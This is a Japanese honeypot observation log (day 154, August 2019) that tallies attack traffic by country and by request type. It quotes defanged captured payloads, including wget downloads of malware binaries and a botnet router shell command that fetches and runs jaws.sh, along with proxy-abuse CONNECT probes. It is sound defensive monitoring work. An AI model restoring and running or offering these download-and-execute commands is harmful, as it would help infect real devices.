この広告は、90日以上更新していないブログに表示しています。

2019-08-18

WOWHoneypot観察(154日目)

Honeypot

2019/08/17(土)

トータルは4084件でした。

ハンティングログは以下です。

129.28.196[.]225 wget+hxxp[:]//ardp[.]hldns[.]ru/loligang.mpsl

www.virustotal.com

189.152.176[.]78 wget+hxxp[:]//185.172.110[.]224/mipsel

www.virustotal.com

IPのロケーション別の件数は以下です。

アルゼンチン	4002
カナダ	29
ブラジル	12
アメリカ	8
インド	4
エストニア	4
トルコ	3
オランダ	3
イラン	3
ウクライナ	2
中国	2
ラトビア	1
アルバニア	1
イタリア	1
マレーシア	1
モーリシャス	1
ケニア	1
メキシコ	1
ロシア	1
南アフリカ	1
コロンビア	1
ミャンマー	1
パキスタン	1

件数	概要	リクエスト
4003	Tomcat管理ページに対するブルートフォース攻撃	GET /manager/html
45	アクセス	GET /
2	Linksys ルータの E シリーズの脆弱性を狙った通信	POST /tmUnblock.cgi
2	phpMyAdminの調査	GET /admin-scripts.asp
1	不正中継の調査	GET hxxps[:]//www[.]torvpn[.]com/myip/
1	ボットネットからのルーターを狙った通信	GET /shell?cd+/tmp;wget+hxxp[:]/\/89.248.174.219/jaws.sh+-O+-+>word.sh;chmod+777+word.sh;sh+word.sh
1	不明	GET /dd/
1	FreePBXの調査	GET //a2billing/customer/templates/default/footer.tpl
1	不正中継の調査	CONNECT chekfast.zennolab.com:443
1	不正中継の調査	CONNECT 91.235.140.148:443
1	不正中継の調査	CONNECT 91.112.19.99:80
1	不正中継の調査	CONNECT 91.112.19.99:443
1	不正中継の調査	CONNECT 54.204.36.156:80
1	不正中継の調査	CONNECT 54.204.36.156:443
1	不正中継の調査	CONNECT 52.32.59.242:443
1	不正中継の調査	CONNECT 52.22.188.80:80
1	不正中継の調査	CONNECT 52.22.188.80:443
1	不正中継の調査	CONNECT 37.1.223.41:80
1	不正中継の調査	CONNECT 35.169.217.16:443
1	不正中継の調査	CONNECT 34.205.226.14:443
1	不正中継の調査	CONNECT 31.13.80.174:443
1	不正中継の調査	CONNECT 3.221.215.74:443
1	不正中継の調査	CONNECT 23.34.204.89:443
1	不正中継の調査	CONNECT 23.34.203.202:443
1	不正中継の調査	CONNECT 23.34.195.144:443
1	不正中継の調査	CONNECT 216.239.34.21:80
1	不正中継の調査	CONNECT 216.239.34.21:443
1	不正中継の調査	CONNECT 209.250.244.126:443
1	不正中継の調査	CONNECT 185.14.169.119:443
1	不正中継の調査	CONNECT 184.29.119.215:443
1	不正中継の調査	CONNECT 176.58.123.25:443
1	不正中継の調査	CONNECT 104.31.64.71:80
1	不正中継の調査	CONNECT 104.31.64.71:443
1	不正中継の調査	CONNECT 104.17.51.195:443
1	不正中継の調査	CONNECT 104.16.66.50:443
1	不正中継の調査	CONNECT 104.16.232.91:443